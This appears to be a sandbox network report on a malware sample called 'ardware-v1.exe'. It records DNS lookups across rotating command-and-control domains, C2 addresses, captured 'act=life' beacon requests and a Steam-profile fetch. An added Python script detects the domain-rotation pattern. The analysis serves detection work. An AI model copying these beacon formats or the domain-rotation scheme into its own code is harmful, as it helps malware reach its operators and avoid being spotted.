                                                                                                                                                                                                              Dec 18, 2024 09:58:51.569812059 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.569962025 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.570022106 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.570060968 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.570091963 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.570106030 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:52.305361032 CET49717443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:52.305404902 CET44349717104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:52.305490971 CET49717443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:52.305783033 CET49717443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:52.305795908 CET44349717104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:53.515053034 CET44349717104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:53.515161991 CET49717443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:53.516355991 CET49717443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:53.516383886 CET44349717104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:53.516738892 CET44349717104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:53.518085003 CET49717443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:53.518205881 CET49717443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:53.518240929 CET44349717104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:54.433700085 CET44349717104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:54.433924913 CET44349717104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:54.436970949 CET49717443192.168.2.8104.21.66.86
Dec 18, 2024 09:58:54.437166929 CET  49717        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:58:54.437191963 CET  443          49717      104.21.66.86     192.168.2.8
Dec 18, 2024 09:58:54.649759054 CET  49718        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:58:54.649863005 CET  443          49718      104.21.66.86     192.168.2.8
Dec 18, 2024 09:58:54.649951935 CET  49718        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:58:54.650269032 CET  49718        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:58:54.650306940 CET  443          49718      104.21.66.86     192.168.2.8
Dec 18, 2024 09:58:55.867820978 CET  443          49718      104.21.66.86     192.168.2.8
Dec 18, 2024 09:58:55.867927074 CET  49718        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:58:55.869142056 CET  49718        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:58:55.869160891 CET  443          49718      104.21.66.86     192.168.2.8
Dec 18, 2024 09:58:55.869573116 CET  443          49718      104.21.66.86     192.168.2.8
Dec 18, 2024 09:58:55.870863914 CET  49718        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:58:55.871007919 CET  49718        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:58:55.871052027 CET  443          49718      104.21.66.86     192.168.2.8
Dec 18, 2024 09:58:55.871171951 CET  49718        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:58:55.915332079 CET  443          49718      104.21.66.86     192.168.2.8
Dec 18, 2024 09:58:57.738023043 CET  443          49718      104.21.66.86     192.168.2.8
Dec 18, 2024 09:58:57.738280058 CET  443          49718      104.21.66.86     192.168.2.8
Dec 18, 2024 09:58:57.738384008 CET  49718        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:58:57.741945028 CET  49718        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:58:57.741982937 CET  443          49718      104.21.66.86     192.168.2.8
Dec 18, 2024 09:58:58.064681053 CET  49719        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:58:58.064774990 CET  443          49719      104.21.66.86     192.168.2.8
Dec 18, 2024 09:58:58.064855099 CET  49719        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:58:58.065381050 CET  49719        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:58:58.065414906 CET  443          49719      104.21.66.86     192.168.2.8
Dec 18, 2024 09:58:59.279557943 CET  443          49719      104.21.66.86     192.168.2.8
Dec 18, 2024 09:58:59.279633045 CET  49719        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:58:59.280900002 CET  49719        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:58:59.280911922 CET  443          49719      104.21.66.86     192.168.2.8
Dec 18, 2024 09:58:59.281244040 CET  443          49719      104.21.66.86     192.168.2.8
Dec 18, 2024 09:58:59.282351017 CET  49719        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:58:59.282465935 CET  49719        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:58:59.282499075 CET  443          49719      104.21.66.86     192.168.2.8
Dec 18, 2024 09:58:59.282562017 CET  49719        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:58:59.282571077 CET  443          49719      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:01.113260984 CET  443          49719      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:01.113504887 CET  443          49719      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:01.113539934 CET  49719        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:01.113642931 CET  49719        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:01.524213076 CET  49720        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:01.524259090 CET  443          49720      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:01.524334908 CET  49720        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:01.524667978 CET  49720        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:01.524682045 CET  443          49720      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:02.733119965 CET  443          49720      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:02.733201027 CET  49720        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:02.734553099 CET  49720        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:02.734564066 CET  443          49720      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:02.734889984 CET  443          49720      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:02.736077070 CET  49720        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:02.736162901 CET  49720        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:02.736167908 CET  443          49720      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:03.594398975 CET  443          49720      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:03.594687939 CET  443          49720      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:03.594758987 CET  49720        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:03.597136974 CET  49720        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:03.597151041 CET  443          49720      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:04.069462061 CET  49721        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:04.069519997 CET  443          49721      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:04.069597960 CET  49721        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:04.069936991 CET  49721        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:04.069957018 CET  443          49721      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:05.286698103 CET  443          49721      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:05.287292957 CET  49721        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:05.291327000 CET  49721        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:05.291356087 CET  443          49721      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:05.291757107 CET  443          49721      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:05.339282036 CET  49721        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:05.395358086 CET  49721        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:05.396779060 CET  49721        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:05.396862984 CET  443          49721      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:05.397623062 CET  49721        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:05.397686005 CET  443          49721      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:05.398015022 CET  49721        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:05.398055077 CET  443          49721      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:05.398355007 CET  49721        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:05.398399115 CET  443          49721      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:05.398597002 CET  49721        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:05.398652077 CET  443          49721      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:05.399099112 CET  49721        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:05.399141073 CET  443          49721      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:05.399158955 CET  49721        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:05.399177074 CET  443          49721      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:05.399710894 CET  49721        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:05.399751902 CET  443          49721      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:05.399785995 CET  49721        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:05.399929047 CET  49721        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:05.399981022 CET  49721        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:05.447350025 CET  443          49721      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:05.447725058 CET  49721        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:05.447788954 CET  49721        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:05.447841883 CET  49721        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:05.495343924 CET  443          49721      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:05.495707989 CET  49721        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:05.525696993 CET  49721        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:05.525724888 CET  443          49721      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:07.871391058 CET  443          49721      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:07.871515989 CET  443          49721      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:07.871583939 CET  49721        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:07.871751070 CET  49721        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:07.871786118 CET  443          49721      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:07.881903887 CET  49722        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:07.881951094 CET  443          49722      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:07.882020950 CET  49722        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:07.882319927 CET  49722        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:07.882338047 CET  443          49722      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:09.100825071 CET  443          49722      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:09.101015091 CET  49722        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:09.102165937 CET  49722        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:09.102171898 CET  443          49722      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:09.102576017 CET  443          49722      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:09.103631973 CET  49722        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:09.103646994 CET  49722        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:09.103720903 CET  443          49722      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:09.910846949 CET  443          49722      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:09.910976887 CET  443          49722      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:09.911041021 CET  49722        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:09.911261082 CET  49722        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:09.911274910 CET  443          49722      104.21.66.86     192.168.2.8
Dec 18, 2024 09:59:09.911303997 CET  49722        443        192.168.2.8      104.21.66.86
Dec 18, 2024 09:59:09.911309958 CET  443          49722      104.21.66.86     192.168.2.8
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Dec 18, 2024 09:58:34.137711048 CET | 59959 | 53 | 192.168.2.8 | 1.1.1.1 |
| Dec 18, 2024 09:58:34.459342957 CET | 53 | 59959 | 1.1.1.1 | 192.168.2.8 |
| Dec 18, 2024 09:58:34.461277008 CET | 52795 | 53 | 192.168.2.8 | 1.1.1.1 |
| Dec 18, 2024 09:58:35.448316097 CET | 52795 | 53 | 192.168.2.8 | 1.1.1.1 |
| Dec 18, 2024 09:58:35.748353958 CET | 53 | 52795 | 1.1.1.1 | 192.168.2.8 |
| Dec 18, 2024 09:58:35.748372078 CET | 53 | 52795 | 1.1.1.1 | 192.168.2.8 |
| Dec 18, 2024 09:58:38.138128996 CET | 54576 | 53 | 192.168.2.8 | 1.1.1.1 |
| Dec 18, 2024 09:58:39.135252953 CET | 54576 | 53 | 192.168.2.8 | 1.1.1.1 |
| Dec 18, 2024 09:58:39.411386967 CET | 53 | 54576 | 1.1.1.1 | 192.168.2.8 |
| Dec 18, 2024 09:58:39.411403894 CET | 53 | 54576 | 1.1.1.1 | 192.168.2.8 |
| Dec 18, 2024 09:58:42.536330938 CET | 65325 | 53 | 192.168.2.8 | 1.1.1.1 |
| Dec 18, 2024 09:58:42.844500065 CET | 53 | 65325 | 1.1.1.1 | 192.168.2.8 |
| Dec 18, 2024 09:58:42.847702980 CET | 52922 | 53 | 192.168.2.8 | 1.1.1.1 |
| Dec 18, 2024 09:58:43.071993113 CET | 53 | 52922 | 1.1.1.1 | 192.168.2.8 |
| Dec 18, 2024 09:58:43.075720072 CET | 58557 | 53 | 192.168.2.8 | 1.1.1.1 |
| Dec 18, 2024 09:58:43.377454042 CET | 53 | 58557 | 1.1.1.1 | 192.168.2.8 |
| Dec 18, 2024 09:58:43.381328106 CET | 56284 | 53 | 192.168.2.8 | 1.1.1.1 |
| Dec 18, 2024 09:58:43.606302977 CET | 53 | 56284 | 1.1.1.1 | 192.168.2.8 |
| Dec 18, 2024 09:58:43.610497952 CET | 58299 | 53 | 192.168.2.8 | 1.1.1.1 |
| Dec 18, 2024 09:58:43.842202902 CET | 53 | 58299 | 1.1.1.1 | 192.168.2.8 |
| Dec 18, 2024 09:58:43.846754074 CET | 59296 | 53 | 192.168.2.8 | 1.1.1.1 |
| Dec 18, 2024 09:58:44.071540117 CET | 53 | 59296 | 1.1.1.1 | 192.168.2.8 |
| Dec 18, 2024 09:58:44.074229956 CET | 55118 | 53 | 192.168.2.8 | 1.1.1.1 |
| Dec 18, 2024 09:58:44.211807966 CET | 53 | 55118 | 1.1.1.1 | 192.168.2.8 |
| Dec 18, 2024 09:58:46.589596033 CET | 53806 | 53 | 192.168.2.8 | 1.1.1.1 |
| Dec 18, 2024 09:58:46.729334116 CET | 53 | 53806 | 1.1.1.1 | 192.168.2.8 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Dec 18, 2024 09:58:34.137711048 CET | 192.168.2.8 | 1.1.1.1 | 0xcea | Standard query (0) | spend-shiny.cyou | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:34.461277008 CET | 192.168.2.8 | 1.1.1.1 | 0x78bf | Standard query (0) | immureprech.biz | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:35.448316097 CET | 192.168.2.8 | 1.1.1.1 | 0x78bf | Standard query (0) | immureprech.biz | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:38.138128996 CET | 192.168.2.8 | 1.1.1.1 | 0xac2d | Standard query (0) | deafeninggeh.biz | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:39.135252953 CET | 192.168.2.8 | 1.1.1.1 | 0xac2d | Standard query (0) | deafeninggeh.biz | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:42.536330938 CET | 192.168.2.8 | 1.1.1.1 | 0x880e | Standard query (0) | effecterectz.xyz | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:42.847702980 CET | 192.168.2.8 | 1.1.1.1 | 0xeb64 | Standard query (0) | diffuculttan.xyz | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:43.075720072 CET | 192.168.2.8 | 1.1.1.1 | 0x4f81 | Standard query (0) | debonairnukk.xyz | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:43.381328106 CET | 192.168.2.8 | 1.1.1.1 | 0x25fb | Standard query (0) | wrathful-jammy.cyou | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:43.610497952 CET | 192.168.2.8 | 1.1.1.1 | 0x6eca | Standard query (0) | awake-weaves.cyou | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:43.846754074 CET | 192.168.2.8 | 1.1.1.1 | 0xb234 | Standard query (0) | sordid-snaked.cyou | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:44.074229956 CET | 192.168.2.8 | 1.1.1.1 | 0xd79e | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:46.589596033 CET | 192.168.2.8 | 1.1.1.1 | 0x49f | Standard query (0) | lev-tolstoi.com | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Dec 18, 2024 09:58:34.459342957 CET | 1.1.1.1 | 192.168.2.8 | 0xcea | Name error (3) | spend-shiny.cyou | none | none | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:35.748353958 CET | 1.1.1.1 | 192.168.2.8 | 0x78bf | No error (0) | immureprech.biz | | 178.62.201.34 | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:35.748353958 CET | 1.1.1.1 | 192.168.2.8 | 0x78bf | No error (0) | immureprech.biz | | 104.131.68.180 | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:35.748353958 CET | 1.1.1.1 | 192.168.2.8 | 0x78bf | No error (0) | immureprech.biz | | 45.77.249.79 | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:35.748372078 CET | 1.1.1.1 | 192.168.2.8 | 0x78bf | No error (0) | immureprech.biz | | 178.62.201.34 | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:35.748372078 CET | 1.1.1.1 | 192.168.2.8 | 0x78bf | No error (0) | immureprech.biz | | 104.131.68.180 | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:35.748372078 CET | 1.1.1.1 | 192.168.2.8 | 0x78bf | No error (0) | immureprech.biz | | 45.77.249.79 | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:39.411386967 CET | 1.1.1.1 | 192.168.2.8 | 0xac2d | No error (0) | deafeninggeh.biz | | 45.77.249.79 | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:39.411386967 CET | 1.1.1.1 | 192.168.2.8 | 0xac2d | No error (0) | deafeninggeh.biz | | 104.131.68.180 | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:39.411386967 CET | 1.1.1.1 | 192.168.2.8 | 0xac2d | No error (0) | deafeninggeh.biz | | 178.62.201.34 | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:39.411403894 CET | 1.1.1.1 | 192.168.2.8 | 0xac2d | No error (0) | deafeninggeh.biz | | 45.77.249.79 | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:39.411403894 CET | 1.1.1.1 | 192.168.2.8 | 0xac2d | No error (0) | deafeninggeh.biz | | 104.131.68.180 | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:39.411403894 CET | 1.1.1.1 | 192.168.2.8 | 0xac2d | No error (0) | deafeninggeh.biz | | 178.62.201.34 | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:42.844500065 CET | 1.1.1.1 | 192.168.2.8 | 0x880e | Name error (3) | effecterectz.xyz | none | none | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:43.071993113 CET | 1.1.1.1 | 192.168.2.8 | 0xeb64 | Name error (3) | diffuculttan.xyz | none | none | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:43.377454042 CET | 1.1.1.1 | 192.168.2.8 | 0x4f81 | Name error (3) | debonairnukk.xyz | none | none | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:43.606302977 CET | 1.1.1.1 | 192.168.2.8 | 0x25fb | Name error (3) | wrathful-jammy.cyou | none | none | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:43.842202902 CET | 1.1.1.1 | 192.168.2.8 | 0x6eca | Name error (3) | awake-weaves.cyou | none | none | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:44.071540117 CET | 1.1.1.1 | 192.168.2.8 | 0xb234 | Name error (3) | sordid-snaked.cyou | none | none | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:44.211807966 CET | 1.1.1.1 | 192.168.2.8 | 0xd79e | No error (0) | steamcommunity.com | | 23.55.153.106 | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:46.729334116 CET | 1.1.1.1 | 192.168.2.8 | 0x49f | No error (0) | lev-tolstoi.com | | 104.21.66.86 | A (IP address) | IN (0x0001) | false |
| Dec 18, 2024 09:58:46.729334116 CET | 1.1.1.1 | 192.168.2.8 | 0x49f | No error (0) | lev-tolstoi.com | | 172.67.157.254 | A (IP address) | IN (0x0001) | false |
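The DNS replies above show the pattern a practitioner wants to detect from resolver logs alone: the sample walks a list of candidate domains, collects NXDOMAIN for most of them within a few seconds, and the two names that do resolve (immureprech.biz and deafeninggeh.biz) return the identical set of three addresses. The script below is an added example and not part of the Joe Sandbox report; it parses the reply rows transcribed from the table (constructed input), flags the NXDOMAIN burst, and groups domains that share an address set. The 30-second window and the threshold of five failures are illustrative choices, not values the report states.

```python
"""Triage the DNS answer table of a sandbox run for C2 domain rotation.

Two signals are computed from the resolver's replies alone:
  1. NXDOMAIN burst: one client failing to resolve many never-seen names in a
     short window is the signature of a sample walking a list of candidate
     C2 domains until one answers.
  2. Shared infrastructure: distinct domains that resolve to the identical set
     of addresses are operated together, so one confirmed-bad domain becomes a
     pivot to the others.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: the reply rows from the report, one per line, as
# "timestamp | trans id | reply code | name | address" ("none" = no address).
SAMPLE_REPLIES = """\
Dec 18, 2024 09:58:34.459342957 CET | 0xcea | Name error (3) | spend-shiny.cyou | none
Dec 18, 2024 09:58:35.748353958 CET | 0x78bf | No error (0) | immureprech.biz | 178.62.201.34
Dec 18, 2024 09:58:35.748353958 CET | 0x78bf | No error (0) | immureprech.biz | 104.131.68.180
Dec 18, 2024 09:58:35.748353958 CET | 0x78bf | No error (0) | immureprech.biz | 45.77.249.79
Dec 18, 2024 09:58:39.411386967 CET | 0xac2d | No error (0) | deafeninggeh.biz | 45.77.249.79
Dec 18, 2024 09:58:39.411386967 CET | 0xac2d | No error (0) | deafeninggeh.biz | 104.131.68.180
Dec 18, 2024 09:58:39.411386967 CET | 0xac2d | No error (0) | deafeninggeh.biz | 178.62.201.34
Dec 18, 2024 09:58:42.844500065 CET | 0x880e | Name error (3) | effecterectz.xyz | none
Dec 18, 2024 09:58:43.071993113 CET | 0xeb64 | Name error (3) | diffuculttan.xyz | none
Dec 18, 2024 09:58:43.377454042 CET | 0x4f81 | Name error (3) | debonairnukk.xyz | none
Dec 18, 2024 09:58:43.606302977 CET | 0x25fb | Name error (3) | wrathful-jammy.cyou | none
Dec 18, 2024 09:58:43.842202902 CET | 0x6eca | Name error (3) | awake-weaves.cyou | none
Dec 18, 2024 09:58:44.071540117 CET | 0xb234 | Name error (3) | sordid-snaked.cyou | none
Dec 18, 2024 09:58:44.211807966 CET | 0xd79e | No error (0) | steamcommunity.com | 23.55.153.106
Dec 18, 2024 09:58:46.729334116 CET | 0x49f | No error (0) | lev-tolstoi.com | 104.21.66.86
Dec 18, 2024 09:58:46.729334116 CET | 0x49f | No error (0) | lev-tolstoi.com | 172.67.157.254
"""

RCODE_RE = re.compile(r"\((\d+)\)")  # numeric RCODE inside "Name error (3)"


def parse_timestamp(text):
    """The report prints nanoseconds; strptime's %f accepts at most six digits."""
    text = text.replace(" CET", "")
    text = re.sub(r"(\.\d{6})\d+", r"\1", text)
    return datetime.strptime(text, "%b %d, %Y %H:%M:%S.%f")


def parse_replies(text):
    """Return (time, trans_id, rcode, name, address) tuples; address is None on NXDOMAIN."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, tid, reply, name, addr = (f.strip() for f in line.split("|"))
        rcode = int(RCODE_RE.search(reply).group(1))
        records.append((parse_timestamp(ts), tid, rcode, name, None if addr == "none" else addr))
    return records


def nxdomain_burst(records, window_seconds=30, threshold=5):
    """Return the NXDOMAIN names (in time order) if `threshold` of them fall in one window."""
    failed = sorted({(t, n) for t, _, rcode, n, _ in records if rcode == 3})
    for i in range(len(failed)):
        j = i
        while j < len(failed) and (failed[j][0] - failed[i][0]).total_seconds() <= window_seconds:
            j += 1
        if j - i >= threshold:
            return [n for _, n in failed[i:j]]
    return []


def shared_infrastructure(records):
    """Group domains by the exact address set they resolved to; keep groups with >1 domain."""
    addrs = defaultdict(set)
    for _, _, rcode, name, addr in records:
        if rcode == 0 and addr:
            addrs[name].add(addr)
    by_set = defaultdict(set)
    for name, ips in addrs.items():
        by_set[frozenset(ips)].add(name)
    return {ips: names for ips, names in by_set.items() if len(names) > 1}


if __name__ == "__main__":
    recs = parse_replies(SAMPLE_REPLIES)
    print("NXDOMAIN burst:", nxdomain_burst(recs))
    for ips, names in shared_infrastructure(recs).items():
        print("shared by", sorted(names), "->", sorted(ips))
```

On the report's data the burst check returns all seven failed names (they fall within ten seconds of each other) and the grouping returns one cluster, immureprech.biz and deafeninggeh.biz on 178.62.201.34, 104.131.68.180 and 45.77.249.79; steamcommunity.com and lev-tolstoi.com sit on CDN addresses and are left alone by the address-set check, which is why a process-context check on the HTTP side is still needed for them.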
• immureprech.biz
• deafeninggeh.biz
• steamcommunity.com
• lev-tolstoi.com
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.8 | 49712 | 178.62.201.34 | 443 | 7748 | C:\Users\user\Desktop\ardware-v1.exe |

Timestamp | Bytes transferred | Direction | Data
2024-12-18 08:58:37 UTC | 262 | OUT |
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: immureprech.biz
2024-12-18 08:58:37 UTC | 8 | OUT |
    Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-12-18 08:58:38 UTC | 94 | IN |
    HTTP/1.1 200 OK
    Date: Wed, 18 Dec 2024 08:58:37 GMT
    Content-Length: 0
    Connection: close


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.8 | 49713 | 45.77.249.79 | 443 | 7748 | C:\Users\user\Desktop\ardware-v1.exe |

Timestamp | Bytes transferred | Direction | Data
2024-12-18 08:58:41 UTC | 263 | OUT |
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: deafeninggeh.biz
2024-12-18 08:58:41 UTC | 8 | OUT |
    Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-12-18 08:58:42 UTC | 94 | IN |
    HTTP/1.1 200 OK
    Date: Wed, 18 Dec 2024 08:58:42 GMT
    Content-Length: 0
    Connection: close


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 2 | 192.168.2.8 | 49714 | 23.55.153.106 | 443 | 7748 | C:\Users\user\Desktop\ardware-v1.exe |

Timestamp | Bytes transferred | Direction | Data
2024-12-18 08:58:45 UTC | 219 | OUT |
    GET /profiles/76561199724331900 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: steamcommunity.com
